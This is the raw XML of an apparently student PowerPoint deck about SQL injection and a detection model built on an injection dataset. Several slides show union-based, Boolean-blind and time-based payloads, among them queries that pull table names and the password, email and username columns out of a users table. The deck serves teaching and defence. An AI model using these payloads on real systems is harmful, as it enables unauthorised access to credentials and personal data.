                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=database() --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0B684-A5FC-4CE2-BCD6-F68140B78D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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3472731"/>
            <a:ext cx="17575729" cy="67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90BD3E5-DF0B-462E-B944-49AB491CBED8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3FBF6-43EA-4966-820E-D3228C608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2B65776-55BC-455B-A7CF-3D3A23A2A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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2476500"/>
            <a:ext cx="17068800" cy="7538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D00D5-CD7A-4886-AEC8-8709B085CE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="791272"/>
            <a:ext cx="17907000" cy="1228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sz="4100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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100" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=0x7573657273—</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36787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1B82E0C-2E9B-4804-97AB-B53D21D7B2D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="0" y="-142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6FEA137-92BA-4568-9A78-376CDA79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4" y="2019300"/>
            <a:ext cx="17221200" cy="802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EC076-6A7C-4160-872E-0F6F2E0291A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-381000" y="876300"/>
            <a:ext cx="1722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ts val="4799"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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100" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Password,Email,Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) from users--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128469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776739" y="77073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6200" y="419100"/>
            <a:ext cx="18516600" cy="1516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3. Blind Boolean-based SQL injection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645983" y="-166534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658496E1-8F54-49BF-B53D-F7DE050CE076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="2931433"/>
            <a:ext cx="16001999" cy="6557734"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1744696" cy="542290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E4A0444B-D56C-43D6-94BA-97F8231E64E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DD7DC27C-E484-422B-B573-C868F34F8ADF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F0FBAB-335D-4129-B21B-94F6BDC52AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3664358"/>
            <a:ext cx="15316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Boolean-based SQL Injection works by submitting a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="45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SQL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query to the database and forcing the application to produce a different response depending on whether the query returns TRUE or FALSE.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0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4F3C602E-C419-4ED9-A291-5BA605757EA4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0C8F906-CD8F-4F2B-AD57-90BE7AB25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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2628900"/>
            <a:ext cx="16611600" cy="739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0D32E-E03F-4FF4-B6AB-7D1EF822D6B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="876300"/>
            <a:ext cx="16764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Id=500'UNION SELECT 1,2,3 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="4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information_schema.tables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WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="4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table_schema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= 'MariaDB' and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="4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table_name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like 'a%';--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52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776739" y="77073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85800" y="494011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978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sto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Gothic Light" panose="020B0300000000000000" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4. Blind Time-based SQL injection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658496E1-8F54-49BF-B53D-F7DE050CE076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="2931433"/>
            <a:ext cx="16001999" cy="6557734"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1744696" cy="542290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E4A0444B-D56C-43D6-94BA-97F8231E64E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DD7DC27C-E484-422B-B573-C868F34F8ADF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F0FBAB-335D-4129-B21B-94F6BDC52AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3619500"/>
            <a:ext cx="14361886" cy="459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Time-based SQL Injection works by sending a SQL query to the database and forcing it to wait for a predetermined length of time (in seconds) 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Query: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Id= 500 UNION SELECT SLEEP(5)--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776739" y="77073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85800" y="494011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Deployment Our Proposed Model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658496E1-8F54-49BF-B53D-F7DE050CE076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="2931433"/>
            <a:ext cx="16001999" cy="6557734"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1744696" cy="542290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E4A0444B-D56C-43D6-94BA-97F8231E64E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DD7DC27C-E484-422B-B573-C868F34F8ADF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F0FBAB-335D-4129-B21B-94F6BDC52AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3619500"/>
            <a:ext cx="1436188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WhatsApp Video 2024-06-26 at 01.01.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47800" y="2931433"/>
            <a:ext cx="15849599" cy="55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776739" y="77073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85800" y="494011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noProof="0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Future Work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658496E1-8F54-49BF-B53D-F7DE050CE076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="2931433"/>
            <a:ext cx="16001999" cy="6557734"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1744696" cy="542290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E4A0444B-D56C-43D6-94BA-97F8231E64E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DD7DC27C-E484-422B-B573-C868F34F8ADF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F0FBAB-335D-4129-B21B-94F6BDC52AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3619500"/>
            <a:ext cx="14361886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spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="750"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>we can enhance our capabilities in identifying, analyzing, and mitigating new types of cyber threats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6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580377">
            <a:off x="9262224" y="-8155147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B46816-D421-4236-BD36-E2D7ACC7F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909522"/>
            <a:ext cx="1752600" cy="20574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B4A80ED3-4C08-4C7E-BD46-3F9DE055C21A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="7277100"/>
            <a:ext cx="11533762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1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9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ANY QUESTION?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5A267D6-DB78-4C20-9FE1-DE417531F01C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346723" y="2966922"/>
            <a:ext cx="9954252" cy="15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1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1200" cap="none" spc="9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589690" y="1265304"/>
            <a:ext cx="12086663" cy="1265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6500" b="1" spc="786" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection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5400" y="3510391"/>
            <a:ext cx="16001999" cy="6052709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05000" y="4273055"/>
            <a:ext cx="1406760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injection is a web security vulnerability that enables an attacker to interfere with an application's database queries, potentially allowing them to view, retrieve, modify and delete data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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938538" y="793590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7200" y="250335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Pure SQL and SQL injection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6" name="Table 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458578E7-DB9E-40ED-A910-E06B064A26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409556"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="996317" y="2628900"/>
          <a:ext cx="16459200" cy="7368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9960">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2420462284"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4724832">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20603805"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="8184408">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4122010156"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1272771">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="4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500" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Definition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500" dirty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166067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Pure SQL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is the language you use to interact with your database.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3000" u="none" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>ORDER BY ProductName;</a:t>
                      </a:r>
                    </a:p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3000" u="none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342900" marR="0" lvl="0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3000" u="none" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>SELECT City FROM Customers UNION SELECT City FROM Suppliers;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="4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07436"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3497580"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1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Injection</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="4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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>SQL Injection is an act performed by a malicious user where they inject code into your existing SQL in order to manipulate the original query.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="4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3000" u="none" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>ORDER BY 1,2,3 –</a:t>
                      </a:r>
                    </a:p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3000" u="none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342900" marR="0" lvl="0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3000" u="none" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>union select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" u="none" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>group_concat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" u="none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en-US" sz="3000" u="none" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>table_name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" u="none" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>) from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" u="none" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" u="none" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> where </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" u="none" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>table_schema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" u="none" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>=database()—</a:t>
                      </a:r>
                    </a:p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3000" u="none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342900" marR="0" lvl="0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3000" u="none" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>union select Database(),version()--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58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7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328939" y="6869103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3346" y="419100"/>
            <a:ext cx="179832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Successful SQL injection attack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E355A-C6F6-4E90-BB5E-A9044F1E9DD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="3619500"/>
            <a:ext cx="1436188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successful SQL injection attack can result in unauthorized access to sensitive data, such as:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Usernames</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 card details</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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user information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Emails</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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7E3D920C-E5DB-427C-9851-02151DB34D10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="1397062"/>
            <a:ext cx="18007752" cy="8187132"/>
            <a:chOff x="0" y="-19050"/>
            <a:chExt cx="1963383" cy="658668"/>
          </a:xfrm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F805FBDA-1D24-435A-B70E-9530D1BAEB3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="218687" y="97328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7BFA1D4F-CE9F-4AF7-BABA-EC0735656C43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487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6046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1000" y="190352"/>
            <a:ext cx="167640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SQL injection types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0132A498-A976-4A90-B565-BD8600FDF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934654"/>
            <a:ext cx="14630400" cy="67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00339" y="66423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05100" y="42294"/>
            <a:ext cx="12877800" cy="1525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7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978" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Gothic Light" panose="020B0300000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SQL Injection Dataset</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="97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sto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Gothic Light" panose="020B03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491284" y="-1197707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E74C0E-294A-4ACC-ABAF-4867696A8371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597018" y="1785232"/>
            <a:ext cx="13963708" cy="29772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4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4500" dirty="0"/>
              <a:t>The shape of the data set:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-EG" sz="4500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>(30952,2)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500" dirty="0"/>
              <a:t>What is the problems in the dataset?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500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A white paper with black lines&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D96B49D-DA0B-C909-26BC-A1174049B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0"/>
            <a:ext cx="13563600" cy="599564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9000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A pie chart with numbers and a red circle&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94AA243-7D45-1B48-0B8C-7E38BBFC4F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r="9035" b="4921"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13868400" y="4762500"/>
            <a:ext cx="4206850" cy="3001080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="584200" dist="508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35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1125</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>229</Paragraphs>
  <Slides>49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Calisto MT</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Oswald Bold</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Times New Roman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1.1 Member Page</vt:lpstr>
      <vt:lpstr>1.2 Pending Member Page </vt:lpstr>
      <vt:lpstr>1.3 Items Page</vt:lpstr>
      <vt:lpstr>1.4 Comments Page</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>2.1 Add Items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Abanoub</dc:creator>
  <cp:lastModifiedBy>Abdelrahman ahmed</cp:lastModifiedBy>
  <cp:revision>106</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-26T06:12:23Z</dcterms:modified>
  <dc:identifier>DAF8NYVFn6o</dc:identifier>
</cp:coreProperties>
</file>